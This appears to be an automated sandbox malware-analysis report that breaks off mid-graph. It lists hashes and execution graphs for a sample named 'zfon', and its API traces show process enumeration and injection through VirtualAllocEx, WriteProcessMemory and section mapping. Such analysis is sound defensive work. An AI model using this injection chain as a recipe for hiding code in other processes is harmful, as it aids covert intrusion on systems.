                                                                                                                                                                            • Opcode Fuzzy Hash: 2301427b651c3a47193e5a8d6ad951242187ad620a5bd31deb8cfb3ac87ac41d
                                                                                                                                                                            • Instruction Fuzzy Hash: 8AF0E76AA18F0296EB449F26E9A417A2320FB8CF80F146071DA4D53B75DF3CE4A5CB10
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                            • Opcode ID: 1505eafe45e457f4db7c5ee298ec8fe61a246f9253c397c6ee0353011936a2de
                                                                                                                                                                            • Instruction ID: a333e9b666ac6061d4b7898e46119ad29a106e139ecde49c7c08bbd2f317aaa5
                                                                                                                                                                            • Opcode Fuzzy Hash: 1505eafe45e457f4db7c5ee298ec8fe61a246f9253c397c6ee0353011936a2de
                                                                                                                                                                            • Instruction Fuzzy Hash: B6F0EC69618F0296EB449F25E9A41792320FB8CF90F145071DA4D53B75DF3CE4A5C710

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:1.2%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                            Signature Coverage:16.5%
                                                                                                                                                                            Total number of Nodes:346
                                                                                                                                                                            Total number of Limit Nodes:45
                                                                                                                                                                            execution_graph 53375 26adfd64080 53390 26adfd65ec0 VirtualAllocEx 53375->53390 53377 26adfd640c5 53385 26adfd6411c 53377->53385 53397 26adfd938a0 TlsFree RtlFreeHeap RtlFreeHeap std::_Facet_Register 53377->53397 53380 26adfd64101 53398 26adfd96b20 RtlFreeHeap RtlFreeHeap 53380->53398 53381 26adfd6421c DName::DName 53385->53381 53399 26adfd56fb0 RtlFreeHeap RtlFreeHeap codecvt _invalid_parameter_noinfo_noreturn 53385->53399 53400 26adfd8d670 RtlFreeHeap RtlFreeHeap std::_Facet_Register 53385->53400 53401 26adfd5ad40 RtlFreeHeap RtlFreeHeap 53385->53401 53402 26adfd659d0 RtlFreeHeap RtlFreeHeap Concurrency::cancel_current_task codecvt _invalid_parameter_noinfo_noreturn 53385->53402 53403 26adfd96b40 2 API calls 4 library calls 53385->53403 53404 26adfd8def0 RtlFreeHeap RtlFreeHeap 53385->53404 53405 26adfd555e0 RtlFreeHeap codecvt _invalid_parameter_noinfo_noreturn 53385->53405 53391 26adfd65ee4 53390->53391 53392 26adfd65eed 53390->53392 53391->53377 53406 26adfd62a60 2 API calls 5 library calls 53392->53406 53394 26adfd65f17 53407 26adfd51510 RtlFreeHeap RtlFreeHeap __std_exception_copy DName::DName 53394->53407 53396 26adfd65f25 Concurrency::cancel_current_task 53397->53380 53398->53385 53399->53385 53400->53385 53401->53385 53402->53385 53403->53385 53405->53385 53406->53394 53407->53396 53408 26adfd64740 53411 26adfd63dd0 53408->53411 53410 26adfd6475c 53412 26adfd63e23 53411->53412 53427 26adfd51630 53412->53427 53414 26adfd63e99 53424 26adfd63f24 53414->53424 53435 26adfd938a0 TlsFree RtlFreeHeap RtlFreeHeap std::_Facet_Register 53414->53435 53417 26adfd63f0a 53436 26adfd96b20 RtlFreeHeap RtlFreeHeap 53417->53436 53418 26adfd64038 DName::DName 53418->53410 53424->53418 53437 26adfd56fb0 RtlFreeHeap RtlFreeHeap codecvt _invalid_parameter_noinfo_noreturn 53424->53437 53438 26adfd8d670 RtlFreeHeap RtlFreeHeap std::_Facet_Register 53424->53438 53439 26adfd5ad40 RtlFreeHeap RtlFreeHeap 53424->53439 53440 26adfd659d0 RtlFreeHeap RtlFreeHeap Concurrency::cancel_current_task codecvt _invalid_parameter_noinfo_noreturn 53424->53440 53441 26adfd96b40 2 API calls 4 library calls 53424->53441 53442 26adfd8def0 RtlFreeHeap RtlFreeHeap 53424->53442 53443 26adfd555e0 RtlFreeHeap codecvt _invalid_parameter_noinfo_noreturn 53424->53443 53428 26adfd516c5 53427->53428 53444 26adfd52030 53428->53444 53430 26adfd51be4 53455 26adfd51580 RtlFreeHeap RtlFreeHeap __std_exception_copy DName::DName 53430->53455 53432 26adfd516e4 53432->53430 53433 26adfd51781 DuplicateHandle 53432->53433 53433->53430 53434 26adfd51bf8 Concurrency::cancel_current_task 53434->53414 53435->53417 53436->53424 53437->53424 53438->53424 53439->53424 53440->53424 53441->53424 53443->53424 53445 26adfd52090 _fread_nolock 53444->53445 53446 26adfd520e2 NtQueryInformationProcess 53445->53446 53446->53445 53450 26adfd5210d 53446->53450 53447 26adfd52111 Concurrency::cancel_current_task 53448 26adfd52143 codecvt DName::DName 53447->53448 53458 26adfdacb34 RtlFreeHeap _invalid_parameter_noinfo _invalid_parameter_noinfo_noreturn 53447->53458 53448->53432 53450->53447 53456 26adfd62a60 2 API calls 5 library calls 53450->53456 53453 26adfd521ab 53457 26adfd51510 RtlFreeHeap RtlFreeHeap __std_exception_copy DName::DName 53453->53457 53455->53434 53456->53453 53457->53447 53459 26adfd64830 53460 26adfd648aa 53459->53460 53481 26adfd648ea 53460->53481 53514 26adfd938a0 TlsFree RtlFreeHeap RtlFreeHeap std::_Facet_Register 53460->53514 53461 26adfd6499f 53462 26adfd649a9 VirtualAllocEx 53461->53462 53467 26adfd64f02 53462->53467 53471 26adfd649d5 53462->53471 53464 26adfd648d0 53515 26adfd96b20 RtlFreeHeap RtlFreeHeap 53464->53515 53544 26adfd62a60 2 API calls 5 library calls 53467->53544 53470 26adfd64f2f 53545 26adfd51510 RtlFreeHeap RtlFreeHeap __std_exception_copy DName::DName 53470->53545 53498 26adfd64a28 codecvt 53471->53498 53520 26adfd938a0 TlsFree RtlFreeHeap RtlFreeHeap std::_Facet_Register 53471->53520 53473 26adfd64bf4 53479 26adfd64c35 WriteProcessMemory 53473->53479 53475 26adfd64f3d Concurrency::cancel_current_task 53476 26adfd64a0e 53521 26adfd96b20 RtlFreeHeap RtlFreeHeap 53476->53521 53485 26adfd64c5f 53479->53485 53481->53461 53516 26adfd8d670 RtlFreeHeap RtlFreeHeap std::_Facet_Register 53481->53516 53517 26adfd56750 RtlFreeHeap RtlFreeHeap 53481->53517 53518 26adfd96b40 2 API calls 4 library calls 53481->53518 53519 26adfd8def0 RtlFreeHeap RtlFreeHeap 53481->53519 53484 26adfd64efd 53543 26adfdacb34 RtlFreeHeap _invalid_parameter_noinfo _invalid_parameter_noinfo_noreturn 53484->53543 53502 26adfd64cab 53485->53502 53530 26adfd938a0 TlsFree RtlFreeHeap RtlFreeHeap std::_Facet_Register 53485->53530 53489 26adfd64c91 53531 26adfd96b20 RtlFreeHeap RtlFreeHeap 53489->53531 53490 26adfd64d60 53536 26adfd63900 2 API calls 4 library calls 53490->53536 53498->53473 53498->53484 53522 26adfd58cb0 RtlFreeHeap RtlFreeHeap std::_Facet_Register 53498->53522 53523 26adfd58d90 RtlFreeHeap RtlFreeHeap 53498->53523 53524 26adfd8d670 RtlFreeHeap RtlFreeHeap std::_Facet_Register 53498->53524 53525 26adfd5ad40 RtlFreeHeap RtlFreeHeap 53498->53525 53526 26adfd659d0 RtlFreeHeap RtlFreeHeap Concurrency::cancel_current_task codecvt _invalid_parameter_noinfo_noreturn 53498->53526 53527 26adfd96b40 2 API calls 4 library calls 53498->53527 53528 26adfd8def0 RtlFreeHeap RtlFreeHeap 53498->53528 53529 26adfd555e0 RtlFreeHeap codecvt _invalid_parameter_noinfo_noreturn 53498->53529 53502->53490 53532 26adfd8d670 RtlFreeHeap RtlFreeHeap std::_Facet_Register 53502->53532 53533 26adfd56750 RtlFreeHeap RtlFreeHeap 53502->53533 53534 26adfd96b40 2 API calls 4 library calls 53502->53534 53535 26adfd8def0 RtlFreeHeap RtlFreeHeap 53502->53535 53503 26adfd64dc4 53512 26adfd64e10 53503->53512 53537 26adfd938a0 TlsFree RtlFreeHeap RtlFreeHeap std::_Facet_Register 53503->53537 53506 26adfd64df6 53538 26adfd96b20 RtlFreeHeap RtlFreeHeap 53506->53538 53508 26adfd64ec0 DName::DName 53512->53508 53539 26adfd8d670 RtlFreeHeap RtlFreeHeap std::_Facet_Register 53512->53539 53540 26adfd56750 RtlFreeHeap RtlFreeHeap 53512->53540 53541 26adfd96b40 2 API calls 4 library calls 53512->53541 53542 26adfd8def0 RtlFreeHeap RtlFreeHeap 53512->53542 53514->53464 53515->53481 53516->53481 53517->53481 53518->53481 53520->53476 53521->53498 53522->53498 53524->53498 53525->53498 53526->53498 53527->53498 53529->53498 53530->53489 53531->53502 53532->53502 53533->53502 53534->53502 53536->53503 53537->53506 53538->53512 53539->53512 53540->53512 53541->53512 53544->53470 53545->53475 53546 26adfd647f0 53549 26adfd646b0 53546->53549 53548 26adfd64804 codecvt 53550 26adfd646d0 53549->53550 53552 26adfd646f0 53549->53552 53551 26adfd646dc CloseHandle 53550->53551 53550->53552 53551->53552 53552->53548 53553 26adfdbe518 53554 26adfdbe51d RtlFreeHeap 53553->53554 53555 26adfdbe538 _Wcrtomb __free_lconv_mon 53553->53555 53554->53555 53556 26adfd55890 53569 26adfd55720 53556->53569 53558 26adfd558bb CreateToolhelp32Snapshot 53559 26adfd5591e 53558->53559 53560 26adfd558d2 Process32FirstW 53558->53560 53596 26adfd8beb0 53559->53596 53560->53559 53561 26adfd558ec 53560->53561 53566 26adfd5590f Process32NextW 53561->53566 53567 26adfd5599a CloseHandle 53561->53567 53579 26adfdacc90 53561->53579 53566->53559 53566->53561 53567->53559 53568 26adfd5597e DName::DName 53567->53568 53570 26adfd55737 53569->53570 53637 26adfd91550 53570->53637 53574 26adfd557a2 53575 26adfd8beb0 std::_Facet_Register 2 API calls 53574->53575 53576 26adfd557f2 53575->53576 53653 26adfd96810 53576->53653 53578 26adfd5582d 53578->53558 53580 26adfdacc9d 53579->53580 53581 26adfdaccc1 53579->53581 53580->53581 53582 26adfdacca2 53580->53582 53583 26adfdaccfb 53581->53583 53586 26adfdacd1a 53581->53586 53714 26adfdb07ac RtlFreeHeap _Wcrtomb 53582->53714 53716 26adfdb07ac RtlFreeHeap _Wcrtomb 53583->53716 53718 26adfdacbb4 RtlFreeHeap TranslateName _Getctype 53586->53718 53587 26adfdacca7 53715 26adfdacb14 RtlFreeHeap _invalid_parameter_noinfo 53587->53715 53588 26adfdacd00 53717 26adfdacb14 RtlFreeHeap _invalid_parameter_noinfo 53588->53717 53592 26adfdaccb2 53592->53561 53593 26adfdbe34c RtlFreeHeap TranslateName 53595 26adfdacd27 53593->53595 53594 26adfdacd0b TranslateName 53594->53561 53595->53593 53595->53594 53598 26adfd8bebb Concurrency::cancel_current_task std::_Facet_Register 53596->53598 53597 26adfd55933 53601 26adfd64260 53597->53601 53598->53597 53719 26adfd51450 RtlFreeHeap RtlFreeHeap __std_exception_copy Concurrency::cancel_current_task 53598->53719 53600 26adfd8beeb 53602 26adfd642a5 53601->53602 53616 26adfd642df 53602->53616 53728 26adfd938a0 TlsFree RtlFreeHeap RtlFreeHeap std::_Facet_Register 53602->53728 53603 26adfd643c7 53720 26adfd63b30 53603->53720 53607 26adfd642c8 53729 26adfd96b20 RtlFreeHeap RtlFreeHeap 53607->53729 53610 26adfd643e4 53611 26adfd65f40 WriteProcessMemory 53610->53611 53615 26adfd6448d 53611->53615 53618 26adfd938a0 TlsFree RtlFreeHeap RtlFreeHeap 53615->53618 53626 26adfd644d0 53615->53626 53616->53603 53730 26adfd56fb0 RtlFreeHeap RtlFreeHeap codecvt _invalid_parameter_noinfo_noreturn 53616->53730 53731 26adfd8d670 RtlFreeHeap RtlFreeHeap std::_Facet_Register 53616->53731 53732 26adfd5ad40 RtlFreeHeap RtlFreeHeap 53616->53732 53733 26adfd659d0 RtlFreeHeap RtlFreeHeap Concurrency::cancel_current_task codecvt _invalid_parameter_noinfo_noreturn 53616->53733 53734 26adfd96b40 2 API calls 4 library calls 53616->53734 53735 26adfd8def0 RtlFreeHeap RtlFreeHeap 53616->53735 53736 26adfd555e0 RtlFreeHeap codecvt _invalid_parameter_noinfo_noreturn 53616->53736 53619 26adfd644b9 53618->53619 53621 26adfd96b20 RtlFreeHeap RtlFreeHeap 53619->53621 53621->53626 53622 26adfd8d670 RtlFreeHeap RtlFreeHeap 53622->53626 53623 26adfd56750 RtlFreeHeap RtlFreeHeap 53623->53626 53624 26adfd64576 53625 26adfd645cc 53624->53625 53627 26adfd938a0 TlsFree RtlFreeHeap RtlFreeHeap 53624->53627 53630 26adfd64670 DName::DName 53625->53630 53632 26adfd8d670 RtlFreeHeap RtlFreeHeap 53625->53632 53634 26adfd56750 RtlFreeHeap RtlFreeHeap 53625->53634 53635 26adfd8def0 RtlFreeHeap RtlFreeHeap 53625->53635 53636 26adfd96b40 RtlFreeHeap RtlFreeHeap 53625->53636 53626->53622 53626->53623 53626->53624 53629 26adfd8def0 RtlFreeHeap RtlFreeHeap 53626->53629 53633 26adfd96b40 RtlFreeHeap RtlFreeHeap 53626->53633 53628 26adfd645b5 53627->53628 53631 26adfd96b20 RtlFreeHeap RtlFreeHeap 53628->53631 53629->53626 53630->53568 53631->53625 53632->53625 53633->53626 53634->53625 53635->53625 53636->53625 53656 26adfd91320 53637->53656 53639 26adfd55767 53640 26adfd592b0 53639->53640 53667 26adfd5c3b0 53640->53667 53642 26adfd5930b 53670 26adfd5cda0 53642->53670 53644 26adfd59336 53673 26adfd92e40 53644->53673 53647 26adfd593f0 53649 26adfd8beb0 std::_Facet_Register 2 API calls 53647->53649 53648 26adfd5936b 53676 26adfd5ab50 53648->53676 53650 26adfd59419 53649->53650 53651 26adfd96810 2 API calls 53650->53651 53652 26adfd594ab DName::DName 53651->53652 53652->53574 53701 26adfd966a0 53653->53701 53655 26adfd9681e 53655->53578 53663 26adfd91340 53656->53663 53657 26adfd8beb0 std::_Facet_Register 2 API calls 53657->53663 53658 26adfd914ba 53660 26adfd91507 53658->53660 53666 26adfd8c268 RtlFreeHeap shared_ptr 53658->53666 53660->53639 53663->53657 53663->53658 53664 26adfd914e0 RtlFreeHeap 53663->53664 53665 26adfd91270 RtlFreeHeap RtlFreeHeap std::_Facet_Register 53663->53665 53664->53663 53665->53663 53666->53660 53668 26adfd8beb0 std::_Facet_Register 2 API calls 53667->53668 53669 26adfd5c3ca 53668->53669 53669->53642 53671 26adfd8beb0 std::_Facet_Register 2 API calls 53670->53671 53672 26adfd5cdbc 53671->53672 53672->53644 53674 26adfd8beb0 std::_Facet_Register 2 API calls 53673->53674 53675 26adfd92e62 53674->53675 53675->53648 53687 26adfd5ce00 53676->53687 53678 26adfd5ab9b 53679 26adfd8beb0 std::_Facet_Register 2 API calls 53678->53679 53680 26adfd5abed 53679->53680 53681 26adfd91550 2 API calls 53680->53681 53682 26adfd5ac2f 53681->53682 53683 26adfd8beb0 std::_Facet_Register 2 API calls 53682->53683 53684 26adfd5ac39 53683->53684 53690 26adfd676bc 53684->53690 53686 26adfd5ac72 DName::DName 53686->53647 53688 26adfd8beb0 std::_Facet_Register 2 API calls 53687->53688 53689 26adfd5ce1a 53688->53689 53689->53678 53691 26adfd676de std::_Lockit::_Lockit 53690->53691 53697 26adfd67722 _Yarn std::_Lockit::~_Lockit 53691->53697 53698 26adfd678e8 RtlFreeHeap RtlFreeHeap std::_Facet_Register 53691->53698 53693 26adfd676f6 53699 26adfd67918 RtlFreeHeap std::locale::_Setgloballocale 53693->53699 53695 26adfd67701 53695->53697 53700 26adfdb1384 RtlFreeHeap RtlFreeHeap _Wcrtomb __free_lconv_mon 53695->53700 53697->53686 53698->53693 53699->53695 53700->53697 53709 26adfd966b7 53701->53709 53702 26adfd8beb0 RtlFreeHeap RtlFreeHeap std::_Facet_Register 53702->53709 53703 26adfd967e4 53705 26adfd96897 53703->53705 53713 26adfd8c268 RtlFreeHeap shared_ptr 53703->53713 53705->53655 53709->53702 53709->53703 53710 26adfd95cb0 RtlFreeHeap RtlFreeHeap std::_Facet_Register 53709->53710 53711 26adfd96870 RtlFreeHeap 53709->53711 53712 26adfd94e30 RtlFreeHeap RtlFreeHeap std::_Facet_Register 53709->53712 53710->53709 53711->53709 53712->53709 53713->53705 53714->53587 53715->53592 53716->53588 53717->53594 53718->53595 53719->53600 53721 26adfd63b9d 53720->53721 53737 26adfd65dd0 2 API calls 4 library calls 53721->53737 53723 26adfd63bba 53724 26adfd8beb0 std::_Facet_Register 2 API calls 53723->53724 53725 26adfd63bc7 53724->53725 53726 26adfd8beb0 std::_Facet_Register 2 API calls 53725->53726 53727 26adfd63bfc 53726->53727 53728->53607 53729->53616 53730->53616 53731->53616 53732->53616 53733->53616 53734->53616 53736->53616 53737->53723 53738 26adfdbe554 53741 26adfdbe563 std::_Facet_Register _Getctype 53738->53741 53740 26adfdbe59d 53741->53740 53742 26adfdb07ac RtlFreeHeap _Wcrtomb 53741->53742 53742->53740 53743 7ff79d073c68 53746 7ff79d0e6ef9 53743->53746 53747 7ff79d0e6f2b 53746->53747 53748 7ff79d0e6ff9 53746->53748 53781 7ff79d0e9d6f 53747->53781 53758 7ff79d0e82c7 53748->53758 53752 7ff79d0e9d6f LoadLibraryA 53753 7ff79d0e6f73 53752->53753 53754 7ff79d0e9d6f LoadLibraryA 53753->53754 53755 7ff79d0e6f89 53754->53755 53756 7ff79d0e9d6f LoadLibraryA 53755->53756 53757 7ff79d073c6d 53756->53757 53759 7ff79d0e9d6f LoadLibraryA 53758->53759 53760 7ff79d0e82f0 53759->53760 53761 7ff79d0e9d6f LoadLibraryA 53760->53761 53762 7ff79d0e8303 53761->53762 53763 7ff79d0e9d6f LoadLibraryA 53762->53763 53764 7ff79d0e8319 53763->53764 53765 7ff79d0e832b VirtualAlloc 53764->53765 53780 7ff79d0e8344 53764->53780 53767 7ff79d0e8370 53765->53767 53765->53780 53766 7ff79d0e9d6f LoadLibraryA 53769 7ff79d0e83e4 53766->53769 53767->53766 53767->53780 53768 7ff79d0e9d6f LoadLibraryA 53770 7ff79d0e843b 53768->53770 53769->53770 53769->53780 53808 7ff79d0e9adf 53769->53808 53770->53768 53773 7ff79d0e847b 53770->53773 53770->53780 53772 7ff79d0e84f2 53774 7ff79d0e850d VirtualAlloc 53772->53774 53779 7ff79d0e853c 53772->53779 53772->53780 53773->53772 53773->53780 53812 7ff79d0e722f LoadLibraryA 53773->53812 53774->53779 53774->53780 53776 7ff79d0e84d9 53776->53780 53813 7ff79d0e735b LoadLibraryA 53776->53813 53779->53780 53785 7ff79d0e8ad3 53779->53785 53780->53757 53782 7ff79d0e9da6 53781->53782 53783 7ff79d0e6f3b 53782->53783 53817 7ff79d0e787b LoadLibraryA 53782->53817 53783->53752 53783->53757 53786 7ff79d0e8b27 53785->53786 53787 7ff79d0e935b 53786->53787 53788 7ff79d0e8b7f NtCreateSection 53786->53788 53790 7ff79d0e8bae 53786->53790 53787->53780 53788->53787 53788->53790 53789 7ff79d0e8c54 NtMapViewOfSection 53797 7ff79d0e8ca8 53789->53797 53790->53787 53790->53789 53791 7ff79d0e9023 VirtualAlloc 53798 7ff79d0e90da 53791->53798 53792 7ff79d0e9adf LoadLibraryA 53792->53797 53794 7ff79d0e9adf LoadLibraryA 53795 7ff79d0e8f84 53794->53795 53795->53791 53795->53794 53815 7ff79d0e9bc7 LoadLibraryA 53795->53815 53796 7ff79d0e91d6 VirtualProtect 53804 7ff79d0e92dc 53796->53804 53805 7ff79d0e91fe 53796->53805 53797->53787 53797->53792 53797->53795 53814 7ff79d0e9bc7 LoadLibraryA 53797->53814 53798->53796 53800 7ff79d0e9152 NtUnmapViewOfSection 53798->53800 53800->53787 53802 7ff79d0e916a NtMapViewOfSection 53800->53802 53802->53787 53802->53796 53804->53787 53816 7ff79d0e9883 LoadLibraryA 53804->53816 53805->53804 53806 7ff79d0e92af VirtualProtect 53805->53806 53806->53805 53811 7ff79d0e9afd 53808->53811 53809 7ff79d0e9ba8 LoadLibraryA 53810 7ff79d0e9bb0 53809->53810 53810->53769 53811->53809 53811->53810 53812->53776 53813->53772 53814->53797 53815->53795 53816->53787 53817->53782 53818 26adfd51835 CloseHandle 53819 26adfd51851 53818->53819 53836 26adfd521e0 2 API calls 5 library calls 53819->53836 53821 26adfd518b7 codecvt 53825 26adfd51969 codecvt 53821->53825 53837 26adfdacb34 RtlFreeHeap _invalid_parameter_noinfo _invalid_parameter_noinfo_noreturn 53821->53837 53824 26adfd51a07 codecvt 53826 26adfd51a10 53824->53826 53828 26adfd51a52 codecvt 53824->53828 53839 26adfdacb34 RtlFreeHeap _invalid_parameter_noinfo _invalid_parameter_noinfo_noreturn 53824->53839 53825->53824 53838 26adfdacb34 RtlFreeHeap _invalid_parameter_noinfo _invalid_parameter_noinfo_noreturn 53825->53838 53830 26adfd51aab codecvt 53828->53830 53840 26adfdacb34 RtlFreeHeap _invalid_parameter_noinfo _invalid_parameter_noinfo_noreturn 53828->53840 53832 26adfd51afb codecvt DName::DName 53830->53832 53841 26adfdacb34 RtlFreeHeap _invalid_parameter_noinfo _invalid_parameter_noinfo_noreturn 53830->53841 53836->53821 53842 26adfd97be0 53843 26adfd97bef 53842->53843 53844 26adfd97bf6 53843->53844 53847 26adfd911b0 53843->53847 53846 26adfd97c1c TlsFree 53848 26adfd911d5 std::bad_exception::bad_exception 53847->53848 53853 26adfd8e480 RtlFreeHeap RtlFreeHeap __std_exception_copy 53848->53853 53850 26adfd91225 53854 26adfd8e710 2 API calls 5 library calls 53850->53854 53852 26adfd91262 53853->53850 53854->53852
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Section$ViewVirtual$Protect$AllocCreateUnmap
                                                                                                                                                                            • String ID: @
                                                                                                                                                                            • API String ID: 814226357-2766056989
                                                                                                                                                                            • Opcode ID: 537dcba744a9e5ab819796c1abf8ff142b8021ff1599a3d2e9f8c20dbb037682
                                                                                                                                                                            • Instruction ID: fcab1204f94ae7232a265729345aeb8628f996360227b576c929d82beedcefa3
                                                                                                                                                                            • Opcode Fuzzy Hash: 537dcba744a9e5ab819796c1abf8ff142b8021ff1599a3d2e9f8c20dbb037682
                                                                                                                                                                            • Instruction Fuzzy Hash: 1362AE72A08B8587EB74DF39E4446ADB7A5FB88B98F804135DA8D47B44EF38E541C720

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_invalid_parameter_noinfo
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3629628435-0
                                                                                                                                                                            • Opcode ID: 58fc19107ec0e66d273cc40dc8bc3f342268e8061c34a6a0b169b5af377fc60a
                                                                                                                                                                            • Instruction ID: 24c62125876a52b3b8d2e18f5c7c401d330d9ca6ee48bb5278aac6f26644c87e
                                                                                                                                                                            • Opcode Fuzzy Hash: 58fc19107ec0e66d273cc40dc8bc3f342268e8061c34a6a0b169b5af377fc60a
                                                                                                                                                                            • Instruction Fuzzy Hash: 6D417870508B188FD795DF18D48875A77E1FB99314F40456EA44DD7295DB39C844CF82

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 295 26adfd64830-26adfd648b8 call 26adfd92960 call 26adfd96900 300 26adfd648fd-26adfd64901 295->300 301 26adfd648ba-26adfd648fb call 26adfd938a0 call 26adfd96b20 295->301 302 26adfd64907-26adfd6490a 300->302 301->302 303 26adfd64910-26adfd64957 call 26adfd92960 call 26adfd8d670 call 26adfd66520 call 26adfd56750 302->303 304 26adfd6499f-26adfd649a2 302->304 340 26adfd6498f-26adfd64999 303->340 341 26adfd64959-26adfd64968 call 26adfd66520 303->341 307 26adfd649a9-26adfd649cf VirtualAllocEx 304->307 308 26adfd649a4 call 26adfd96650 304->308 312 26adfd649d5-26adfd649f6 call 26adfd92960 call 26adfd96900 307->312 313 26adfd64f03-26adfd64f55 call 26adfd51ed0 call 26adfd62a60 call 26adfd51510 call 26adfda0a14 307->313 308->307 331 26adfd64a3b-26adfd64a3f 312->331 332 26adfd649f8-26adfd64a39 call 26adfd938a0 call 26adfd96b20 312->332 334 26adfd64a45-26adfd64a48 331->334 332->334 338 26adfd64a4e-26adfd64a5c 334->338 339 26adfd64bf4-26adfd64bf7 334->339 346 26adfd64a60-26adfd64b00 call 26adfd58cb0 call 26adfd524c0 call 26adfd58d90 338->346 342 26adfd64bfe-26adfd64c5a call 26adfd524c0 WriteProcessMemory call 26adfd63a50 339->342 343 26adfd64bf9 call 26adfd96650 339->343 340->303 340->304 358 26adfd6496a-26adfd64986 call 26adfd56a60 call 26adfd96b40 341->358 359 26adfd64987-26adfd6498a call 26adfd8def0 341->359 366 26adfd64c5f-26adfd64c79 call 26adfd92960 call 26adfd96900 342->366 343->342 375 26adfd64b35-26adfd64ba1 call 26adfd92960 call 26adfd8d670 call 26adfd66520 call 26adfd5ad40 call 26adfd659d0 346->375 376 26adfd64b02-26adfd64b14 346->376 358->359 359->340 385 26adfd64cbe-26adfd64cc2 366->385 386 26adfd64c7b-26adfd64cbc call 26adfd938a0 call 26adfd96b20 366->386 420 26adfd64bda-26adfd64bee call 26adfd555e0 375->420 421 26adfd64ba3-26adfd64bb2 call 26adfd66520 375->421 378 26adfd64b2f-26adfd64b34 call 26adfd8beec 376->378 379 26adfd64b16-26adfd64b29 376->379 378->375 379->378 382 26adfd64efd-26adfd64f02 call 26adfdacb34 379->382 382->313 388 26adfd64cc8-26adfd64ccb 385->388 386->388 392 26adfd64d60-26adfd64d63 388->392 393 26adfd64cd1-26adfd64d18 call 26adfd92960 call 26adfd8d670 call 26adfd66520 call 26adfd56750 388->393 397 26adfd64d6a-26adfd64dde call 26adfd524c0 call 26adfd63900 call 26adfd92960 call 26adfd96900 392->397 398 26adfd64d65 call 26adfd96650 392->398 428 26adfd64d50-26adfd64d5a 393->428 429 26adfd64d1a-26adfd64d29 call 26adfd66520 393->429 444 26adfd64de0-26adfd64e21 call 26adfd938a0 call 26adfd96b20 397->444 445 26adfd64e23-26adfd64e24 397->445 398->397 420->339 420->346 434 26adfd64bd1-26adfd64bd9 call 26adfd8def0 421->434 435 26adfd64bb4-26adfd64bd0 call 26adfd56a60 call 26adfd96b40 421->435 428->392 428->393 441 26adfd64d2b-26adfd64d47 call 26adfd56a60 call 26adfd96b40 429->441 442 26adfd64d48-26adfd64d4b call 26adfd8def0 429->442 434->420 435->434 441->442 442->428 447 26adfd64e2a-26adfd64e2d 444->447 445->447 451 26adfd64ec0-26adfd64ec3 447->451 452 26adfd64e33-26adfd64e79 call 26adfd92960 call 26adfd8d670 call 26adfd66520 call 26adfd56750 447->452 458 26adfd64ecd-26adfd64efc call 26adfd8be90 451->458 459 26adfd64ec5-26adfd64ec8 call 